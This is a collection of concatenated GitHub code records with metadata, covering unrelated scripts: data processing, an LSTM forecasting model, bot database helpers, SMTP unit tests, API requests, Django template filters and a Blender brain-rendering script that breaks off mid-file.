\n # The result of this operation is at 5arc min. The withdrawal and demand data is at 30s though. 
Resampling to 30s using the \"mode\" aka majority\n i_mean_30s = zonal_stats_to_raster(i_mean,zones30s,geometrySmall,1e10,\"mode\",scale30s).select([\"mode\"])\n i_mean_30s = i_mean_30s.copyProperties(\n source = i_mean,\n exclude= [\"resolution\",\"spatial_resolution\"])\n i_mean_30s = set_properties(i_mean_30s)\n \n asset_id = export_asset(i_mean_30s)\n logger.info(asset_id)\n elapsed = datetime.datetime.now() - function_time_start\n print(\"Processing image {} month {} of year {} runtime {}\".format(index,row[\"month\"],row[\"year\"],elapsed))\n\n\n# In[20]:\n\nend = datetime.datetime.now()\nelapsed = end - start\nprint(elapsed)\n\n","repo_name":"wri/Aqueduct30Docker","sub_path":"notebooks/production/Y2018M02D27_RH_Moving_Average_Discharge_EE_V01.py","file_name":"Y2018M02D27_RH_Moving_Average_Discharge_EE_V01.py","file_ext":"py","file_size_in_byte":13241,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"1210498772","text":"def getSum(a: int, b: int) -> int:\n MASK = 0xFFFFFFFF\n INT_MASk = 0x7FFFFFFF\n\n while b != 0:\n a, b = (a ^ b) & MASK, ((a & b) << 1) & MASK\n\n if a > INT_MASk:\n a = ~(a ^ MASK)\n return a\nprint(getSum(1, 2))\n","repo_name":"angelatto/Algorithm","sub_path":"LeetCode/371.py","file_name":"371.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36811744864","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 3 16:31:23 2023\n\n@author: wangshuyou\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 10 20:10:19 2022\n\n@author: wangshuyou\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport math\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Dropout, Activation\nfrom keras.layers.core import Flatten\nfrom keras.layers import LSTM\nfrom sklearn.metrics import mean_squared_error\nimport time\nimport random\nimport warnings\nwarnings.filterwarnings('ignore')\n\nstart = time.time() # 開始測量\n\n# 載入訓練資料\ndf_eth = pd.read_excel(\"C:\\碩論資料\\eth.xlsx\",index_col='date')\ndf_eth = df_eth.sort_index()\n\ndf_eth['close_lag'] = df_eth['close'].shift(1)\ndf_eth['ln_clo'] = df_eth['close'].apply(np.log)\ndf_eth['ln_clo_lag'] = df_eth['close_lag'].apply(np.log)\ndf_eth['r'] = df_eth['ln_clo'] - df_eth['ln_clo_lag']\ndf_eth = df_eth.where(df_eth.notnull(),0)\n\n\n# train/test set 73分\ntrain = df_eth.loc[:'2021-04-27 23:55:00',:]\ntest = pd.concat([df_eth,train]).drop_duplicates(keep = False) \n\n# 實際波動度\ndef rv(x):\n return np.sqrt(np.sum(x**2))\nrv_all = df_eth['r'].groupby(pd.Grouper(freq = 'D')).apply(rv)\nrv_train = train['r'].groupby(pd.Grouper(freq = 'D')).apply(rv)\nrv_test = test['r'].groupby(pd.Grouper(freq = 'D')).apply(rv)\n\n# 1349筆資料預測下1期\nxx,y = [],[]\nfor i in range(1349,len(rv_all)):\n xx.append(rv_all.iloc[i-1349:i])\n y.append(rv_all.iloc[i])\nxx,y = np.array(xx),np.array(y) # array特性,行列相反\nxx = np.reshape(xx, (xx.shape[0],xx.shape[1],1)) #轉成3維,INDEX=0 是前1349個\n# 3維的意義:[樣本\\時間步\\功能]\n\n#Build the model\n# 共五層:3 hidden layers + 2 fully connected layers\nrandom.seed(0)\nmodel = Sequential()\n# 第1層layers\nmodel.add(LSTM(10,input_shape=(xx.shape[1],1),return_sequences=True))\nmodel.add(Dropout(0.3))# 捨棄率,防止overfitting \n# units = 神經元的數目 \n# 第2層layers\nmodel.add(LSTM(4, return_sequences=True))\nmodel.add(Dropout(0.8)) \n# 第3層layers\nmodel.add(LSTM(2, 
return_sequences=True))\nmodel.add(Dropout(0.8)) \nmodel.add(Dense(1))\nmodel.add(Flatten())\n# 第4層connected layer\nmodel.add(Dense(5))\n# 第5層connected layer\nmodel.add(Dense(1))\n\nmodel.compile(loss='mean_squared_error', optimizer='adam')\nmodel.fit(xx, y,epochs=150, batch_size = 1349,verbose=2)\n# verbose = 2 :為每個epochs輸出一行紀錄\n# epoch : 期,演算法完整使用150次資料集每筆資料的狀態\n\nXt = model.predict(xx)\nplt.plot(y,label = 'True') # 維度更改成1行1列: -1的功能是自動計算,C = 1, C/D(個數) = 576\nplt.plot(Xt,label = 'Predict')\nplt.xlabel('Days')\nplt.ylabel('Realized Volatility')\nplt.title('LSTM_RV_predict_1D')\nplt.legend()\nplt.show()\n\ny = y.reshape(-1,1)\ndef mae(y,yhat):\n mae = sum(abs(y-yhat))/len(y)\n return mae\n#MSE 可以評價資料的變化程度\ndef rmse(y, yhat):\n rmse = np.sqrt(sum(((y - yhat)*(y - yhat))))\n return rmse\n#MAPE:表示預測值和實際值之間的平均偏差為?%\ndef mape(y, yhat):\n mape = (y - yhat)/y\n mape[~np.isfinite(mape)] = 0 # 先計算除法,在處理除以0變成inf的問題\n mape = np.mean(np.abs(mape)) * 100\n return mape\n# =============================================================================\n\nprint('MAE:%3f ' % mae(y,Xt))\nprint('RMSE:%3f ' % rmse(y,Xt))\nprint('MAPE:%3f' % mape(y,Xt))\n\n\nend = time.time() # 結束測量\nprint(\"執行時間:%f 秒\" % (end - start))\n\n\n\n\n\n","repo_name":"WSY-Samuel/Master_thesis","sub_path":"LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"1893451985","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\ndef load_led_data(path_led: str) -> pd.DataFrame:\n \"\"\"\n Load the LED activation data using pandas.\n \"\"\"\n return pd.read_csv(path_led, header=0) # Adjust header argument if needed\n\ndef get_first_led_frames(led_data: pd.DataFrame) -> np.array:\n \"\"\"\n Extract frame numbers of the first frame of each LED activation.\n \"\"\"\n # Identifying transitions from 0 to 4095 in the 'dp' column.\n activated_indices = np.where((led_data['dp'].shift() == 0) & (led_data['dp'] == 4095))[0]\n \n # Extracting the frame numbers at these indices.\n frames = led_data.loc[activated_indices, 'frame_nr'].to_numpy()\n \n return frames\n\ndef plot_led_activations(frames: np.array) -> None:\n \"\"\"\n Plot frame numbers of the first frame of each LED activation.\n \"\"\"\n plt.figure(figsize=(15, 10))\n plt.scatter(frames, [1]*len(frames), color='red') # plotting at y=1 for visibility, adjust as needed\n plt.title(\"LED Activations\")\n plt.xlabel(\"Frame Number\")\n plt.ylabel(\"LED Activation\")\n plt.yticks([]) # hide y axis ticks\n # plt.savefig(\"NAME_OF_PLOT_FILE.svg\") # Uncomment to save the plot as an SVG file \n plt.show()\n\nif __name__ == '__main__':\n path_led = r\"PATH_TO_TEH_LED_DATA_CSV\"\n led_data = load_led_data(path_led)\n first_frames = get_first_led_frames(led_data)\n plot_led_activations(first_frames)\n","repo_name":"SamuelZidaric/thesis","sub_path":"plotting_templates/local/loop_activation_led.py","file_name":"loop_activation_led.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36151777573","text":"from __future__ import print_function\nfrom __future__ import division\nimport six\nfrom six.moves import xrange\nimport struct\nfrom applog import *\nimport sys\nimport time\n\ndef hexByte(value):\n\treturn \"0x{:02x}\".format(value)\ndef hexShort(value):\n\treturn \"0x{:04x}\".format(value)\ndef hexWord(value):\n\treturn 
\"0x{:08x}\".format(value)\n\ndef hexByteFromData(data):\n\t(byte,)=struct.unpack('B',data[:1])\n\treturn hexByte(byte)\ndef hexShortFromData(data):\n\t(short,)=struct.unpack('H',data[:2])\n\treturn hexShort(short)\t\ndef hexWordFromData(data):\n\t(word,)=struct.unpack('I',data[:4])\n\treturn hexWord(word)\t\n\n#\n# inverts the endianness of a scalar (integer) value\n# \t\ndef invertEndian(scalar):\n\n\t# first convert scalar to a byte array\n\tbytesPacked = struct.pack('=Q', scalar)\n\t\n\t#\n\t# now unpack and invert endian by specifying struct.unpack()\n\t# endian that is opposite of the native endian for the platform\n\t# we're running on. I'm expecting all Python implementations\n\t# to do endian inversions by byte swapping, so this method should\n\t# be portable\n\t#\n\tif sys.byteorder == 'little':\n\t\t# on little-endian platform. invert endian by specifying big endian\n\t\t(value,) = struct.unpack('>Q', bytesPacked)\n\telse:\n\t\t# on big-endian platform. invert endian by specifying little endian\n\t\t(value,) = struct.unpack(': xx xx xx xx xx xx xx xx - xx xx xx xx xx xx xx xx yyyyyyyy - yyyyyyyy\n#\n# bytesPerField=2:\n#\n#\t: xxxx xxxx xxxx xxxx - xxxx xxxx xxxx xxx yyyyyyyy - yyyyyyyy\n#\n# bytesPerField=4:\n#\n#\t: xxxxxxxx xxxxxxxx - xxxxxxxx xxxxxxx yyyyyyyy - yyyyyyyy\n#\n# Where 'xx' are the hex values of each byte/halfword/word and 'y' is\n# the ASCII character equivalent ('.' for each non-printable ASCII value <32 or >127)\n#\ndef hexdump(data, bytesPerField=1, includeASCII=1):\n\tbytesPerFieldToUnpackStr = { 1 : 'B', 2 : 'H', 4 : 'I', 8 : 'Q' }\n\tstrHexDump=''\n\tif bytesPerField not in bytesPerFieldToUnpackStr:\n\t\tapplog_w(\"hexdump: bytesPerField invalid. must be 1, 2, 4, or 8\")\n\t\treturn strHexDump\n\tif (len(data) % bytesPerField) != 0:\n\t\tapplog_w(\"hexdump: size of data (0x{:04x}) is not a multiple of bytesPerField ({:d})\".format(len(data), bytesPerField))\n\t\treturn strHexDump\n\tfor offset in xrange(0,len(data),bytesPerField):\n\t\toffsetThisFieldInLine = (offset % 16)\t# byte offset into data for this field of current line\n\t\tendingOffsetThisFieldInLine = offsetThisFieldInLine + bytesPerField\t\t\n\t\tif (offsetThisFieldInLine == 0):\n\t\t\tstrHexDump += \"{:04x}: \".format(offset)\n\t\t(thisField,) = struct.unpack(bytesPerFieldToUnpackStr[bytesPerField], data[offset:offset+bytesPerField])\n\t\tstrHexDump += \"{:0{:d}x} \".format(thisField, bytesPerField*2)\t\t# (value,width) - width: bytes=2, halfwords=4, words=8\n\t\tif (endingOffsetThisFieldInLine == 8):\n\t\t\tstrHexDump += \"- \"\n\t\tif (endingOffsetThisFieldInLine == 16 or (offset==len(data)-1)):\n\t\t\t# just processed 16 bytes of line or have reached final byte\n\t\t\t# of buffer (partial last line). Add ASCII representation\n\t\t\t# of hex values on this line.\n\t\t\tbIsFinalLine = (offset == len(data)-1)\n\t\t\tif includeASCII:\n\t\t\t\tif (endingOffsetThisFieldInLine < 16):\n\t\t\t\t\t# final line is a partial line. 
pad with spaces to\n\t\t\t\t\t# fill out area that would normally contain hex\n\t\t\t\t\t# values before start ASCII dump seciton\n\t\t\t\t\tfieldsNotPrintedInFinalLine = (16-endingOffsetThisFieldInLine) * bytesPerField\n\t\t\t\t\tcharactersPerFieldIncludingSpace = bytesPerField*2 + 1\n\t\t\t\t\tstrHexDump += \" \" * (fieldsNotPrintedInFinalLine*charactersPerFieldIncludingSpace) # add spaces for each missing field\t\t\t\t\n\t\t\t\t\tif (endingOffsetThisFieldInLine < 8):\n\t\t\t\t\t\tstrHexDump += \" \"\t\t\t\t\t\t\t\t# add spaces for missing middle separator\n\t\t\t\tfor asciiOffset in range(offsetThisFieldInLine+1):\n\t\t\t\t\t(thisByte,) = struct.unpack('B', data[offset-offsetThisFieldInLine+asciiOffset:offset-offsetThisFieldInLine+asciiOffset+1])\n\t\t\t\t\tif (thisByte >= 32 and thisByte <= 127):\n\t\t\t\t\t\tstrHexDump += six.unichr(thisByte)\n\t\t\t\t\telse:\n\t\t\t\t\t\tstrHexDump += \".\"\n\t\t\t\t\tif (asciiOffset == 7):\n\t\t\t\t\t\tstrHexDump += \" - \"\n\t\t\tif not bIsFinalLine:\t# don't put newline after final line\n\t\t\t\tstrHexDump += \"\\n\"\n\treturn strHexDump\n\t\t\n","repo_name":"shezi/airmtp","sub_path":"strutil.py","file_name":"strutil.py","file_ext":"py","file_size_in_byte":5385,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"54"} +{"seq_id":"2491328752","text":"#User function Template for python3\nfrom enum import Enum\n\nclass Direction(Enum):\n LeftToRight = 0\n RightToLeft = 1\n\n'''\nclass Node:\n def init(self, val):\n self.right = None\n self.data = val\n self.left = None\n'''\n# your task is to complete this function\ndef findSpiral(root):\n answer = []\n if root == None:\n return answer\n\n direction = Direction.RightToLeft\n current_level = 0\n nodes = [[root]]\n must_visited = [root] \n\n while len(must_visited) > 0:\n nodes_to_explore = nodes[current_level]\n\n # print nodes\n add_to_answer(nodes_to_explore, direction, answer)\n # change direction\n direction = Direction.RightToLeft if direction == Direction.LeftToRight else Direction.LeftToRight\n\n current_level += 1\n must_visited.clear()\n for node in nodes_to_explore:\n if node.left != None:\n must_visited.append(node.left)\n if node.right != None:\n must_visited.append(node.right)\n\n if len(must_visited) > 0:\n nodes.append(must_visited.copy())\n\n return answer\n\n\ndef add_to_answer(nodes, direction, answer):\n if direction == Direction.LeftToRight:\n for node in nodes:\n answer.append(node.data) \n else:\n for node in reversed(nodes):\n answer.append(node.data) \n\n\n\n\n\n\n\n\n#{ \n# Driver Code Starts\n#Initial Template for Python 3\n\n#Initial Template for Python 3\n\n\n\n#Contributed by Sudarshan Sharma\nfrom collections import deque\n# Tree Node\nclass Node:\n def __init__(self, val):\n self.right = None\n self.data = val\n self.left = None\n\n\n\n \n# Function to Build Tree \ndef buildTree(s):\n #Corner Case\n if(len(s)==0 or s[0]==\"N\"): \n return None\n \n # Creating list of strings from input \n # string after spliting by space\n ip=list(map(str,s.split()))\n \n # Create the root of the tree\n root=Node(int(ip[0])) \n size=0\n q=deque()\n \n # Push the root to the queue\n q.append(root) \n size=size+1 \n \n # Starting from the second element\n i=1 \n while(size>0 and i=len(ip)):\n break\n currVal=ip[i]\n \n # If the right child is not null\n if(currVal!=\"N\"):\n \n # Create the right child for the current node\n currNode.right=Node(int(currVal))\n \n # Push it to the queue\n q.append(currNode.right)\n size=size+1\n i=i+1\n return 
root\n \n \nif __name__==\"__main__\":\n t=int(input())\n for _ in range(0,t):\n s=input()\n root=buildTree(s)\n result = findSpiral(root)\n for value in result:\n print(value,end = \" \")\n print()\n \n \n\n# } Driver Code Ends","repo_name":"mostafa-asg/Algo","sub_path":"geeksforgeeks/tree/level-order-traversal-in-spiral-form/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"33502431478","text":"from loader import cursor, connect\n\ndef add_help_record(help_user_id,helper_id):\n sql_add_query = f\"INSERT INTO help_user VALUES({helper_id}, {help_user_id})\"\n cursor.execute(sql_add_query)\n connect.commit()\n\ndef delete_help_record(help_user_id):\n sql_delete_query = f\"DELETE from help_user where id_user = {help_user_id}\"\n cursor.execute(sql_delete_query)\n connect.commit()\n\ndef add_admin(id_user):\n sql_add_query = f\"INSERT INTO admin VALUES({id_user})\"\n cursor.execute(sql_add_query)\n connect.commit()\n\ndef delete_admin(user_id):\n sql_delete_query = f\"DELETE from admin where id = {user_id}\"\n cursor.execute(sql_delete_query)\n connect.commit()\n\ndef add_helper(id_user):\n sql_add_query = f\"INSERT INTO helper VALUES({id_user})\"\n cursor.execute(sql_add_query)\n connect.commit()\n\ndef delete_helper(user_id):\n sql_delete_query = f\"DELETE from helper where id = {user_id}\"\n cursor.execute(sql_delete_query)\n connect.commit()\n\ndef len_admin():\n list_admin = []\n result = cursor.execute(\"SELECT id FROM admin\").fetchall()\n for i in range(len(result)):\n res = result[i]\n id = res[0]\n list_admin.append(id)\n return list_admin\n\ndef len_helper():\n list_helper = []\n result = cursor.execute(\"SELECT id FROM helper\").fetchall()\n for i in range(len(result)):\n res = result[i]\n id = res[0]\n list_helper.append(id)\n return list_helper\n\ndef take_info(from_user_id):\n result = cursor.execute(\"SELECT user_id,user_name FROM users\").fetchall()\n for i in range(len(result)):\n res = result[i]\n id,user_name = res\n if from_user_id == id:\n return user_name \n\ndef ask_qui(id_user,text_message):\n pass","repo_name":"rksipythonpeople/hakaton","sub_path":"utils/func_change_bd.py","file_name":"func_change_bd.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31689115926","text":"import unittest\nfrom mox import MoxTestBase, IsA\nfrom gevent.socket import socket\n\nfrom slimta.smtp.datareader import DataReader\nfrom slimta.smtp.io import IO\nfrom slimta.smtp import ConnectionLost, MessageTooBig\n\n\nclass TestSmtpDataReader(MoxTestBase, unittest.TestCase):\n\n def setUp(self):\n super(TestSmtpDataReader, self).setUp()\n self.sock = self.mox.CreateMock(socket)\n self.sock.fileno = lambda: -1\n\n def test_append_line(self):\n dr = DataReader(None)\n dr._append_line(b'asdf')\n dr._append_line(b'jkl\\r\\n')\n dr.i += 1\n dr._append_line(b'qwerty')\n self.assertEqual([b'asdfjkl\\r\\n', b'qwerty'], dr.lines)\n\n def test_from_recv_buffer(self):\n io = IO(None)\n io.recv_buffer = b'test\\r\\ndata'\n dr = DataReader(io)\n dr.from_recv_buffer()\n self.assertEqual([b'test\\r\\n', b'data'], dr.lines)\n\n def test_handle_finished_line_EOD(self):\n dr = DataReader(None)\n dr.lines = [b'.\\r\\n']\n dr.handle_finished_line()\n self.assertEqual(0, dr.EOD)\n\n def test_handle_finished_line_initial_period(self):\n dr = DataReader(None)\n dr.lines = 
[b'..stuff\\r\\n']\n dr.handle_finished_line()\n self.assertEqual(b'.stuff\\r\\n', dr.lines[0])\n\n def test_add_lines(self):\n dr = DataReader(None)\n dr.add_lines(b'\\r\\ntwo\\r\\n.three\\r\\nfour')\n self.assertEqual([b'\\r\\n', b'two\\r\\n', b'three\\r\\n', b'four'], dr.lines)\n self.assertEqual(3, dr.i)\n self.assertEqual(None, dr.EOD)\n\n def test_recv_piece(self):\n self.sock.recv(IsA(int)).AndReturn(b'one\\r\\ntwo')\n self.sock.recv(IsA(int)).AndReturn(b'\\r\\nthree\\r\\n.\\r\\nstuff\\r\\n')\n self.mox.ReplayAll()\n dr = DataReader(IO(self.sock))\n self.assertTrue(dr.recv_piece())\n self.assertFalse(dr.recv_piece())\n self.assertEqual([b'one\\r\\n', b'two\\r\\n', b'three\\r\\n',\n b'.\\r\\n', b'stuff\\r\\n', b''], dr.lines)\n self.assertEqual(3, dr.EOD)\n self.assertEqual(5, dr.i)\n\n def test_recv_piece_already_eod(self):\n dr = DataReader(None)\n dr.EOD = 2\n self.assertFalse(dr.recv_piece())\n\n def test_recv_piece_connectionlost(self):\n self.sock.recv(IsA(int)).AndReturn(b'')\n self.mox.ReplayAll()\n dr = DataReader(IO(self.sock))\n self.assertRaises(ConnectionLost, dr.recv_piece)\n\n def test_recv_piece_messagetoobig(self):\n self.sock.recv(IsA(int)).AndReturn(b'1234567890')\n self.mox.ReplayAll()\n dr = DataReader(IO(self.sock), 9)\n self.assertRaises(MessageTooBig, dr.recv_piece)\n\n def test_return_all(self):\n io = IO(None)\n dr = DataReader(io)\n dr.lines = [b'one\\r\\n', b'two\\r\\n', b'.\\r\\n', b'three\\r\\n']\n dr.EOD = 2\n self.assertEqual(b'one\\r\\ntwo\\r\\n', dr.return_all())\n self.assertEqual(b'three\\r\\n', io.recv_buffer)\n\n def test_recv(self):\n self.sock.recv(IsA(int)).AndReturn(b'\\r\\nthree\\r\\n')\n self.sock.recv(IsA(int)).AndReturn(b'.\\r\\nstuff\\r\\n')\n self.mox.ReplayAll()\n io = IO(self.sock)\n io.recv_buffer = b'one\\r\\ntwo'\n dr = DataReader(io)\n self.assertEqual(b'one\\r\\ntwo\\r\\nthree\\r\\n', dr.recv())\n\n\n# vim:et:fdm=marker:sts=4:sw=4:ts=4\n","repo_name":"slimta/python-slimta","sub_path":"test/test_slimta_smtp_datareader.py","file_name":"test_slimta_smtp_datareader.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"54"} +{"seq_id":"28581420930","text":"import requests\nimport json\nimport pandas as pd\nfrom time import sleep\nimport matplotlib.pyplot as plt\n\ndef get_response(data: str,cantidad : int ) -> list:\n\n\t'''Obtiene los primeros 'X' characteres una API.\n\tLos datos devueltos se guardan en una lista y es retornada\n\n\tData = Url con una barra diagonal '/' como ultimo caracter.\n\tCantidad = Personajes a retornar.\n\n\tEjemplo : https://rickandmortyapi.com/api/character/ X-> La x se reemplazara luego por numeros entre 1-10\n\n\t'''\n\n\tcharacters = []\n\tfor i in range(1,cantidad+1):\n\n\t\turl = f'{data}{i}'\n\t\t# Paso los datos a formato JSON O DICCIONARIO\n\t\tr = requests.get(url).json()\n\t\tcharacters.append(r)\n\treturn characters\n\ndef apariciones(dato : list) -> dict:\n '''\n :param dato: Lista con los datos de los personajes\n :return: Diccionario con las apariciones en episodios de cada uno\n '''\n diccionario = {}\n indice = 0\n for i in range(0,len(dato)):\n diccionario[dato[indice]['name']] = len(dato[indice]['episode'])\n indice += 1\n return diccionario\n\nrick_morty = get_response('https://rickandmortyapi.com/api/character/',10)\n\ndf = pd.DataFrame(rick_morty)\n\ndf.set_index('id',inplace=True)\ndf=df.drop('created',axis=1)\ndf=df.drop('url',axis=1)\ndf = df.drop('image',axis=1)\ndf = 
df.drop('location',axis=1)\ndf = df.drop('origin',axis=1)\ndf = df.drop('type',axis=1)\npd.set_option('display.max_columns',5)\n\n\ndf['episode'] = df['episode'].apply(len)\n\nhumanos = [i for i in df['species'] if i == 'Human']\nmales = [i for i in df['gender'] if i == 'Male']\n\n# print(f\"Hay {len(humanos)} humanos en la lista\\n\"\n #f\"Hay {len(males)} hombres en la lista del total de {len(df['name'])}\")\n\n#Diccionario con los valores de los episodios donde aparece cada uno\n\napar_episodios = apariciones(rick_morty)\n\n#GRAFICO DE LAS APARICIONES\n\nnames = list(apar_episodios.keys())\nvalores = list(apar_episodios.values())\n\n\nplt.bar(names,valores,width=.6)\nplt.title('Apariciones en Episodios')\nplt.xlabel('Personajes')\nplt.ylabel('Cantidad De Episodios')\nplt.xticks(fontsize=7)\n\nplt.show()","repo_name":"gonzaloramosgh/PracticandoRequest","sub_path":"RequestAPI-RickAndMorty.py","file_name":"RequestAPI-RickAndMorty.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9599677965","text":"from django import template\n\nfrom recipes.models import Wishlist, Favorite, Follow\n\nregister = template.Library()\n\n\n@register.filter\ndef check_wishlist(recipe, user):\n \"\"\"Проверяет добавлен ли рецепт в список покупок\"\"\"\n check = Wishlist.objects.filter(\n recipe_id=recipe.id, user_id=user.id).exists()\n return check\n\n\n@register.filter\ndef check_favorite(recipe, user):\n \"\"\"Проверяет добавлен ли рецепт в избранное\"\"\"\n check = Favorite.objects.filter(\n recipe_id=recipe.id, user_id=user.id).exists()\n return check\n\n\n@register.filter\ndef check_subscription(author, user):\n \"\"\"Проверяет подписан ли текущий пользователь на автора\"\"\"\n check = Follow.objects.filter(\n following=author.id, subscriber=user.id).exists()\n return check\n","repo_name":"VolkovCode/foodgram-project","sub_path":"recipes/templatetags/check_atribute.py","file_name":"check_atribute.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21748449580","text":"import scipy.io\nimport bpy\nimport numpy as np\nimport colorsys\nfrom abc import ABC, abstractmethod\nimport os\nimport argparse\nimport sys\nimport glob\nimport sys\nimport matplotlib #modified by Justin Chen 5/22/20 to visualize right hand side of the brain\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg \nimport PIL\nfrom PIL import Image #end of modification - Justin Chen 5/22/20\n\ndef getInterpColor(abn_level, COLOR_POINTS, COLOR_POINTS_NEG): #modified by Justin Chen to represent negative values 5/27/20\n # given an abnormality level, it computes the associated color\n # works in HSV space\n\n if abn_level < 0:\n abn_level = abn_level *-1\n if abn_level >= (len(COLOR_POINTS_NEG)-1):\n abn_level = len(COLOR_POINTS_NEG) - 1.01\n \n sigmaLevel = int(abn_level)\n abn_level -= sigmaLevel\n assert 0 <= abn_level <= 1\n\n rgb_color = (1-abn_level)*COLOR_POINTS_NEG[sigmaLevel] + abn_level*COLOR_POINTS_NEG[sigmaLevel+1]\n else: #end of modification - Justin Chen 5/27/20\n if abn_level >= (len(COLOR_POINTS)-1):\n abn_level = len(COLOR_POINTS) - 1.01\n\n sigmaLevel = int(abn_level)\n abn_level -= sigmaLevel\n # print('abn_level', abn_level)\n # print('len(COLOR_POINTS)', len(COLOR_POINTS))\n # print('sigmaLevel', sigmaLevel)\n assert 0 <= abn_level <= 1\n\n # hue - 120 green 80 - yellow 40 - orange 0 
-red\n rgb_color = (1-abn_level)*COLOR_POINTS[sigmaLevel] + abn_level*COLOR_POINTS[sigmaLevel+1]\n\n return rgb_color\n\ndef nZeroOne(a):\n return not (a == 0 or a == 1)\n\n\nclass BrainPainter(ABC):\n @abstractmethod\n def loadMeshes(self):\n pass\n\n def prepareScene(self, resolution, bckColor, fov, ortho_scale, BRAIN_TYPE):\n # delete the cube\n scene = bpy.context.scene\n for ob in scene.objects:\n if ob.type == 'MESH' and ob.name.startswith(\"Cube\"):\n ob.select = True\n else:\n ob.select = False\n bpy.ops.object.delete()\n bpy.data.worlds['World'].horizon_color = bckColor\n \n self.setCamera(resolution, fov, ortho_scale, BRAIN_TYPE)\n self.setLamp(BRAIN_TYPE)\n\n def deletePrevLamps(self):\n scene = bpy.data.scenes[\"Scene\"]\n for key in [k for k in scene.objects.keys() if k.startswith('Lamp')]:\n scene.objects[key].select = True\n bpy.ops.object.delete()\n\n for lamp_data in bpy.data.lamps:\n bpy.data.lamps.remove(lamp_data)\n\n def prepareCamera(self, resolution, fov):\n scene = bpy.data.scenes[\"Scene\"]\n\n # Set render resolution\n scene.render.resolution_x = resolution[0]*2 # need to multiply by 2 for some reason\n scene.render.resolution_y = resolution[1]*2\n\n # Set camera fov in degrees\n\n pi = 3.14159265\n scene.camera.data.angle = fov * (pi / 180.0)\n\n # Set camera rotation in euler angles\n scene.camera.rotation_mode = 'XYZ'\n\n @abstractmethod\n def setCamera(self, resolution, fov, ortho_scale, BRAIN_TYPE):\n pass\n\n @abstractmethod\n def setLamp(self, BRAIN_TYPE):\n pass\n\n\nclass CorticalPainter(BrainPainter):\n def __init__(self, cortFiles):\n self.cortFiles = cortFiles\n\n # def loadCortical(cortFiles):\n\n def loadMeshes(self):\n # import cortical regions and set them to be almost transparent\n \n for i in range(len(self.cortFiles)):\n bpy.ops.import_mesh.ply(filepath=self.cortFiles[i])\n\n if bpy.context.selected_objects:\n for obj in bpy.context.selected_objects:\n regionName = obj.name\n if not 'mat_%s' % regionName in bpy.data.materials.keys():\n material = makeMaterial('mat_%s' % regionName, (0.3, 0.3, 0.3), (1, 1, 1), 1.0)\n obj.data.materials.append(material)\n else:\n material = bpy.data.materials['mat_%s' % regionName]\n material.diffuse_color = (0.3, 0.3, 0.3)\n material.alpha = 1\n obj.data.materials.append(material)\n\n def setCamera(self, resolution, fov, ortho_scale, BRAIN_TYPE):\n\n scene = bpy.data.scenes[\"Scene\"]\n\n self.prepareCamera(resolution, fov)\n\n pi = 3.14159265\n \n scene.camera.rotation_euler = (pi / 2, 0, -3 * pi / 2)\n # Set camera location\n scene.camera.location = (167.00, -15.1, 3.824)\n if BRAIN_TYPE == 'inflated':\n scene.camera.location = (167.00, -0.3, 3.824)\n\n bpy.data.cameras['Camera'].type = 'ORTHO'\n bpy.data.cameras['Camera'].ortho_scale = ortho_scale\n bpy.data.cameras['Camera'].clip_end = 1000\n # bpy.data.objects['']\n\n def setLamp(self, BRAIN_TYPE):\n \n energyAll = 5\n distanceAll = 1000\n\n scene = bpy.data.scenes[\"Scene\"]\n self.deletePrevLamps()\n\n lampIndices = [1, 2, 3, 4]\n lampLocs = [(136, 45, 72), (136, -105, -64), (136, -105, 72), (136, 45, -64)]\n if BRAIN_TYPE == 'inflated':\n lampIndices = [1, 2, 3, 4, 5]\n lampLocs = [(136, 160, 130), (136, -140, -64), (136, -140, 130), (136, 160, -64), (136, 0, 130)]\n energyAll = 13\n\n nrLamps = len(lampIndices)\n\n for l in range(nrLamps):\n # Create new lamp datablock\n lamp_data = bpy.data.lamps.new(name=\"lamp%d data\" % lampIndices[l], type='POINT')\n # Create new object with our lamp datablock\n lamp = bpy.data.objects.new(name=\"Lamp%d\" % 
